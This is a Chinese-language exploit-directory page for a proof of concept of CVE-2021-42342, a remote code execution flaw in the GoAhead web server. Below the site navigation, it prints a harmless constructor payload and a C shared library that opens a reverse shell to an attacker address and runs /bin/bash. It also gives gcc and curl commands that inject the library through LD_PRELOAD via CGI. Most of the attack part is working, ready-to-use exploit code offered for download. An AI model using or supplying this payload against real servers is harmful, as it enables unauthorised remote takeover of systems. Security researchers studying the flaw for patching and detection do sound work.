Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-42342 — CVE-2021-42342 的概念验证漏洞利用程序,该漏洞是 GoAhead Web 服务器中的一个远程代码执行漏洞,演示了通过 CGI 进行 LD_PRELOAD 注入,以实现代码执行和反弹 Shell。 | Kitploit
工具/GitHubGitHub/mr-xn/cve-2021-42342
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试Payload 开发
GitHubmr-xn/cve-2021-42342

CVE-2021-42342

CVE-2021-42342 的概念验证漏洞利用程序,该漏洞是 GoAhead Web 服务器中的一个远程代码执行漏洞,演示了通过 CGI 进行 LD_PRELOAD 注入,以实现代码执行和反弹 Shell。

查看仓库
4164年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-42342

CVE-2021-42342 远程代码执行(RCE)

POC1:仅打印

root@kitploit:~
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello World!\n", 14);
}

POC2:反向 Shell

root@kitploit:~
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

char *server_ip="***";
uint32_t server_port=7777;

static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  execve("/bin/bash", 0, 0);
}

使用方法:

步骤1: gcc hack.c -fPIC -shared -o poc.so

步骤2: curl -X POST http://[TARGET]/cgi-bin/ -F "LD_PRELOAD=/proc/self/fd/0" -F file='@poc.so;encoder=base64'

来源:

  • https://github.com/kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-
  • https://mp.weixin.qq.com/s/AS9DHeHtgqrgjTb2gzLJZg
下载工具